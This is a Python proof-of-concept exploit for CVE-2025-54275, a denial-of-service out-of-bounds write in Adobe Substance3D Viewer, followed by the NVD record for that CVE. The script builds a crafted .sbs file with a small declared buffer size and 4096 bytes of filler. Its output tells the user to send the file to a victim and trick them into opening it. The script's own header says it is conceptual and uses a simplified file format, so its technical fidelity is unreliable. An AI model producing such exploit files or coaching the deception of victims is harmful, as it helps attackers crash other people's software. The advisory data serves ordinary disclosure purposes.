CVE-2025-54275

# CVE-2025-54275 PoC - Adobe Substance3D Viewer Out-of-Bounds Write DoS # Vulnerability: Out-of-bounds write in file parsing leading to application crash # Affected: Substance3D Viewer <= 0.25.2 # Note: This is a conceptual PoC demonstrating the attack pattern. # A real exploit requires crafting a malicious Substance file (e.g., .sbs/.sbsar) # with malformed data fields that trigger buffer overflow during parsing. import struct import os def create_malicious_substance_file(output_path): """ Create a malicious Substance file that triggers out-of-bounds write when parsed by Substance3D Viewer 0.25.2 and earlier. """ # Substance file format header (simplified representation) header = b'SBS\x00' # Magic bytes for Substance file version = struct.pack('<I', 0x00010000) # Version 1.0 # Malicious payload: oversized data field that triggers OOB write # Normal buffer size might be 256 bytes, but we provide much more data declared_size = struct.pack('<I', 256) # Declared buffer size (small) actual_data = b'\x41' * 4096 # Actual data (much larger than declared) # Craft the malicious file malicious_file = header + version + declared_size + actual_data with open(output_path, 'wb') as f: f.write(malicious_file) print(f"[+] Malicious file created: {output_path}") print(f"[!] Send this file to victim and trick them to open it in Substance3D Viewer") print(f"[!] Application will crash due to out-of-bounds write") if __name__ == "__main__": output = "exploit_CVE-2025-54275.sbs" create_malicious_substance_file(output) print(f"\n[*] File size: {os.path.getsize(output)} bytes") print(f"[*] Attack vector: Local (requires user to open malicious file)") print(f"[*] Impact: Denial of Service (application crash)")

{"cve": {"id": "CVE-2025-54275", "sourceIdentifier": "[email protected]", "published": "2025-10-14T19:15:43.323", "lastModified": "2025-10-14T20:21:25.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Viewer versions 0.25.2 and earlier are affected by an out-of-bounds write vulnerability that could lead to application denial-of-service. An attacker could leverage this vulnerability to crash the application or make it unavailable. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_viewer:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.25.2", "matchCriteriaId": "5757450C-E7A8-4082-B84C-E82930AD428F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-viewer/apsb25-99.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}